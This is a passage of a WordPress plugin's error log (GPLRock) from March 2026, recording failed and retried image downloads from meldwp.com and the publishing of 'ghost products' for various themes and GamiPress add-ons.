Code: 526, Error: . Retrying... [25-Mar-2026 01:36:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/takorent---food-trucking-wordpress-theme-4658.webp for product takorent-food-trucking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:36:22 UTC] GPLRock: Image download failed for product takorent-food-trucking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:24 UTC] GPLRock: Image download failed for product takorent-food-trucking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/takorent---food-trucking-wordpress-theme-4658.webp for product takorent-food-trucking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:36:26 UTC] GPLRock WARNING: Image download failed for product takorent-food-trucking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/takorent---food-trucking-wordpress-theme-4658.webp [25-Mar-2026 01:36:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: takorent-food-trucking-wordpress-theme [25-Mar-2026 01:36:27 UTC] GPLRock: Image download failed for product winger-aviation-flight-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:29 UTC] GPLRock: Image download failed for product winger-aviation-flight-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/winger---aviation--flight-school-wordpress-theme-31029.webp for product winger-aviation-flight-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:36:32 UTC] GPLRock: Image download failed for product winger-aviation-flight-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:34 UTC] GPLRock: Image download failed for product winger-aviation-flight-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [25-Mar-2026 01:36:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/winger---aviation--flight-school-wordpress-theme-31029.webp for product winger-aviation-flight-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [25-Mar-2026 01:36:36 UTC] GPLRock WARNING: Image download failed for product winger-aviation-flight-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/winger---aviation--flight-school-wordpress-theme-31029.webp [25-Mar-2026 01:36:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: winger-aviation-flight-school-wordpress-theme [25-Mar-2026 01:36:37 UTC] GPLRock: Image download failed for product holistic-center-wellness-and-spa-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:21 UTC] GPLRock: Image download failed for product the-dmcs-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:23 UTC] GPLRock: Image download failed for product vizox-immigration-visa-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:23 UTC] GPLRock: Image download failed for product the-dmcs-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:25 UTC] GPLRock: Image download failed for product vizox-immigration-visa-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-dmcs---woocommerce-theme-23515.webp for product the-dmcs-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:26 UTC] GPLRock: Image download failed for product the-dmcs-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vizox---immigration-visa-wordpress-theme-16968.webp for product vizox-immigration-visa-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:27 UTC] GPLRock: Image download failed for product vizox-immigration-visa-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:28 UTC] GPLRock: Image download failed for product the-dmcs-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:29 UTC] GPLRock: Image download failed for product vizox-immigration-visa-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-dmcs---woocommerce-theme-23515.webp for product the-dmcs-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:30 UTC] GPLRock WARNING: Image download failed for product the-dmcs-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/the-dmcs---woocommerce-theme-23515.webp [26-Mar-2026 01:30:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-dmcs-woocommerce-theme [26-Mar-2026 01:30:30 UTC] GPLRock: Image download failed for product affliction-multipurpose-minimal-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vizox---immigration-visa-wordpress-theme-16968.webp for product vizox-immigration-visa-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:31 UTC] GPLRock WARNING: Image download failed for product vizox-immigration-visa-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vizox---immigration-visa-wordpress-theme-16968.webp [26-Mar-2026 01:30:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vizox-immigration-visa-wordpress-theme [26-Mar-2026 01:30:32 UTC] GPLRock: Image download failed for product affliction-multipurpose-minimal-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:32 UTC] GPLRock: Image downloaded successfully for product july-morison-event-photographers-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a225cb3.webp [26-Mar-2026 01:30:32 UTC] GPLRock: Using pre-downloaded image for product july-morison-event-photographers-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a225cb3.webp [26-Mar-2026 01:30:32 UTC] GPLRock: Ghost product published with image - Product ID: july-morison-event-photographers-portfolio-wordpress-theme [26-Mar-2026 01:30:33 UTC] GPLRock: Image download failed for product motopress-auto-repair-mechanic-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/affliction---multipurpose-minimal-wordpress-woocommerce-theme-32235.webp for product affliction-multipurpose-minimal-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:34 UTC] GPLRock: Image download failed for product affliction-multipurpose-minimal-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:35 UTC] GPLRock: Image download failed for product motopress-auto-repair-mechanic-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:37 UTC] GPLRock: Image download failed for product affliction-multipurpose-minimal-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motopress---auto-repair--mechanic-shop-wordpress-theme-7278.webp for product motopress-auto-repair-mechanic-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:37 UTC] GPLRock: Image download failed for product motopress-auto-repair-mechanic-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/affliction---multipurpose-minimal-wordpress-woocommerce-theme-32235.webp for product affliction-multipurpose-minimal-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:39 UTC] GPLRock WARNING: Image download failed for product affliction-multipurpose-minimal-wordpress-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/affliction---multipurpose-minimal-wordpress-woocommerce-theme-32235.webp [26-Mar-2026 01:30:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: affliction-multipurpose-minimal-wordpress-woocommerce-theme [26-Mar-2026 01:30:39 UTC] GPLRock: Image download failed for product kahlo-art-gallery-and-museum-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:40 UTC] GPLRock: Image download failed for product motopress-auto-repair-mechanic-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:41 UTC] GPLRock: Image download failed for product kahlo-art-gallery-and-museum-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motopress---auto-repair--mechanic-shop-wordpress-theme-7278.webp for product motopress-auto-repair-mechanic-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:42 UTC] GPLRock WARNING: Image download failed for product motopress-auto-repair-mechanic-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/motopress---auto-repair--mechanic-shop-wordpress-theme-7278.webp [26-Mar-2026 01:30:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: motopress-auto-repair-mechanic-shop-wordpress-theme [26-Mar-2026 01:30:42 UTC] GPLRock: Image download failed for product morz-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kahlo---art-gallery-and-museum-wordpress-theme-9833.webp for product kahlo-art-gallery-and-museum-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:43 UTC] GPLRock: Image download failed for product kahlo-art-gallery-and-museum-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:45 UTC] GPLRock: Image download failed for product morz-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:45 UTC] GPLRock: Image download failed for product kahlo-art-gallery-and-museum-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/morz---logistics-wordpress-theme-6328.webp for product morz-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:47 UTC] GPLRock: Image download failed for product morz-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kahlo---art-gallery-and-museum-wordpress-theme-9833.webp for product kahlo-art-gallery-and-museum-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:48 UTC] GPLRock WARNING: Image download failed for product kahlo-art-gallery-and-museum-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kahlo---art-gallery-and-museum-wordpress-theme-9833.webp [26-Mar-2026 01:30:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kahlo-art-gallery-and-museum-wordpress-theme [26-Mar-2026 01:30:48 UTC] GPLRock: Image download failed for product morave-portfolio-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:49 UTC] GPLRock: Image download failed for product morz-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:50 UTC] GPLRock: Image download failed for product morave-portfolio-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/morz---logistics-wordpress-theme-6328.webp for product morz-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:51 UTC] GPLRock WARNING: Image download failed for product morz-logistics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/morz---logistics-wordpress-theme-6328.webp [26-Mar-2026 01:30:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: morz-logistics-wordpress-theme [26-Mar-2026 01:30:51 UTC] GPLRock: Image download failed for product heat-responsive-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/morave---portfolio-elementor-wordpress-theme-25169.webp for product morave-portfolio-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:52 UTC] GPLRock: Image download failed for product morave-portfolio-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:53 UTC] GPLRock: Image download failed for product heat-responsive-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:55 UTC] GPLRock: Image download failed for product morave-portfolio-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/heat---responsive-photography-wordpress-theme-30301.webp for product heat-responsive-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:56 UTC] GPLRock: Image download failed for product heat-responsive-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/morave---portfolio-elementor-wordpress-theme-25169.webp for product morave-portfolio-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:30:57 UTC] GPLRock WARNING: Image download failed for product morave-portfolio-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/morave---portfolio-elementor-wordpress-theme-25169.webp [26-Mar-2026 01:30:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: morave-portfolio-elementor-wordpress-theme [26-Mar-2026 01:30:57 UTC] GPLRock: Image download failed for product seo-engine-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:58 UTC] GPLRock: Image download failed for product heat-responsive-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:30:59 UTC] GPLRock: Image download failed for product seo-engine-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/heat---responsive-photography-wordpress-theme-30301.webp for product heat-responsive-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:00 UTC] GPLRock WARNING: Image download failed for product heat-responsive-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/heat---responsive-photography-wordpress-theme-30301.webp [26-Mar-2026 01:31:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: heat-responsive-photography-wordpress-theme [26-Mar-2026 01:31:00 UTC] GPLRock: Image download failed for product blogxpress-blog-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seo-engine---digital-marketing-agency-wordpress-theme-22431.webp for product seo-engine-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:01 UTC] GPLRock: Image download failed for product seo-engine-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:02 UTC] GPLRock: Image download failed for product blogxpress-blog-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:03 UTC] GPLRock: Image download failed for product seo-engine-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blogxpress---blog-news-wordpress-theme-19779.webp for product blogxpress-blog-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:04 UTC] GPLRock: Image download failed for product blogxpress-blog-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seo-engine---digital-marketing-agency-wordpress-theme-22431.webp for product seo-engine-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:06 UTC] GPLRock WARNING: Image download failed for product seo-engine-digital-marketing-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/seo-engine---digital-marketing-agency-wordpress-theme-22431.webp [26-Mar-2026 01:31:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: seo-engine-digital-marketing-agency-wordpress-theme [26-Mar-2026 01:31:06 UTC] GPLRock: Image download failed for product antilia-architect-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:07 UTC] GPLRock: Image download failed for product blogxpress-blog-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:08 UTC] GPLRock: Image download failed for product antilia-architect-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blogxpress---blog-news-wordpress-theme-19779.webp for product blogxpress-blog-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:09 UTC] GPLRock WARNING: Image download failed for product blogxpress-blog-news-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blogxpress---blog-news-wordpress-theme-19779.webp [26-Mar-2026 01:31:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blogxpress-blog-news-wordpress-theme [26-Mar-2026 01:31:09 UTC] GPLRock: Image download failed for product bili-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/antilia---architect--interior-design-wordpress-theme-30693.webp for product antilia-architect-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:10 UTC] GPLRock: Image download failed for product antilia-architect-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:11 UTC] GPLRock: Image download failed for product bili-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:12 UTC] GPLRock: Image download failed for product antilia-architect-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bili---creative-agency-wordpress-theme-27104.webp for product bili-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:13 UTC] GPLRock: Image download failed for product bili-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/antilia---architect--interior-design-wordpress-theme-30693.webp for product antilia-architect-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:14 UTC] GPLRock WARNING: Image download failed for product antilia-architect-interior-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/antilia---architect--interior-design-wordpress-theme-30693.webp [26-Mar-2026 01:31:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: antilia-architect-interior-design-wordpress-theme [26-Mar-2026 01:31:14 UTC] GPLRock: Image download failed for product vaidy-physical-therapy-chiropractor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:15 UTC] GPLRock: Image download failed for product bili-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bili---creative-agency-wordpress-theme-27104.webp for product bili-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:18 UTC] GPLRock WARNING: Image download failed for product bili-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bili---creative-agency-wordpress-theme-27104.webp [26-Mar-2026 01:31:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bili-creative-agency-wordpress-theme [26-Mar-2026 01:31:18 UTC] GPLRock: Image download failed for product jocey-equestrian-riding-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:20 UTC] GPLRock: Image download failed for product jocey-equestrian-riding-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jocey---equestrian--riding-club-wordpress-theme-22131.webp for product jocey-equestrian-riding-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:22 UTC] GPLRock: Image download failed for product jocey-equestrian-riding-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:24 UTC] GPLRock: Image download failed for product jocey-equestrian-riding-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jocey---equestrian--riding-club-wordpress-theme-22131.webp for product jocey-equestrian-riding-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:27 UTC] GPLRock WARNING: Image download failed for product jocey-equestrian-riding-club-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/jocey---equestrian--riding-club-wordpress-theme-22131.webp [26-Mar-2026 01:31:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jocey-equestrian-riding-club-wordpress-theme [26-Mar-2026 01:31:27 UTC] GPLRock: Image download failed for product hoexr-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:29 UTC] GPLRock: Image download failed for product hoexr-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hoexr---hotel-booking-wordpress-theme-5004.webp for product hoexr-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:31 UTC] GPLRock: Image download failed for product hoexr-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:34 UTC] GPLRock: Image download failed for product hoexr-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hoexr---hotel-booking-wordpress-theme-5004.webp for product hoexr-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:36 UTC] GPLRock WARNING: Image download failed for product hoexr-hotel-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hoexr---hotel-booking-wordpress-theme-5004.webp [26-Mar-2026 01:31:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hoexr-hotel-booking-wordpress-theme [26-Mar-2026 01:31:36 UTC] GPLRock: Image download failed for product captura-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:38 UTC] GPLRock: Image download failed for product captura-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/captura---photography-portfolio-wordpress-theme-1190.webp for product captura-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:41 UTC] GPLRock: Image download failed for product captura-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:43 UTC] GPLRock: Image download failed for product captura-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 01:31:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/captura---photography-portfolio-wordpress-theme-1190.webp for product captura-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 01:31:45 UTC] GPLRock WARNING: Image download failed for product captura-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/captura---photography-portfolio-wordpress-theme-1190.webp [26-Mar-2026 01:31:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: captura-photography-portfolio-wordpress-theme [26-Mar-2026 18:03:58 UTC] GPLRock: Image downloaded successfully for product gamipress-easy-digital-downloads-points-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-47c83b49.jpg [26-Mar-2026 18:03:58 UTC] GPLRock: Using pre-downloaded image for product gamipress-easy-digital-downloads-points-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-47c83b49.jpg [26-Mar-2026 18:03:58 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-easy-digital-downloads-points-gateway [26-Mar-2026 18:03:59 UTC] GPLRock: Image downloaded successfully for product gamipress-easy-digital-downloads-partial-payments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b72004ba.jpg [26-Mar-2026 18:03:59 UTC] GPLRock: Using pre-downloaded image for product gamipress-easy-digital-downloads-partial-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b72004ba.jpg [26-Mar-2026 18:03:59 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-easy-digital-downloads-partial-payments [26-Mar-2026 18:04:00 UTC] GPLRock: Image download failed for product autoride-chauffeur-limousine-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:01 UTC] GPLRock: Image downloaded successfully for product gamipress-easy-digital-downloads-discounts (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8682ed33.jpg [26-Mar-2026 18:04:01 UTC] GPLRock: Using pre-downloaded image for product gamipress-easy-digital-downloads-discounts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8682ed33.jpg [26-Mar-2026 18:04:01 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-easy-digital-downloads-discounts [26-Mar-2026 18:04:02 UTC] GPLRock: Image downloaded successfully for product gamipress-rest-api-extended (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5cc2b882.jpg [26-Mar-2026 18:04:02 UTC] GPLRock: Image download failed for product autoride-chauffeur-limousine-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:02 UTC] GPLRock: Using pre-downloaded image for product gamipress-rest-api-extended: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5cc2b882.jpg [26-Mar-2026 18:04:02 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-rest-api-extended [26-Mar-2026 18:04:03 UTC] GPLRock: Image downloaded successfully for product gamipress-admin-emails (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-062f0a97.jpg [26-Mar-2026 18:04:03 UTC] GPLRock: Using pre-downloaded image for product gamipress-admin-emails: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-062f0a97.jpg [26-Mar-2026 18:04:03 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-admin-emails [26-Mar-2026 18:04:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autoride---chauffeur-limousine-booking-wordpress-theme-14992.webp for product autoride-chauffeur-limousine-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [26-Mar-2026 18:04:04 UTC] GPLRock: Image download failed for product autoride-chauffeur-limousine-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [26-Mar-2026 18:04:04 UTC] GPLRock: Image downloaded successfully for product gamipress-conditional-emails (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f967cd06.jpg [26-Mar-2026 18:04:04 UTC] GPLRock: Using pre-downloaded image for product gamipress-conditional-emails: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f967cd06.jpg [26-Mar-2026 18:04:04 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-conditional-emails [26-Mar-2026 18:04:05 UTC] GPLRock: Image downloaded successfully for product gamipress-frontend-awards (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-055d8eb0.jpg [26-Mar-2026 18:04:05 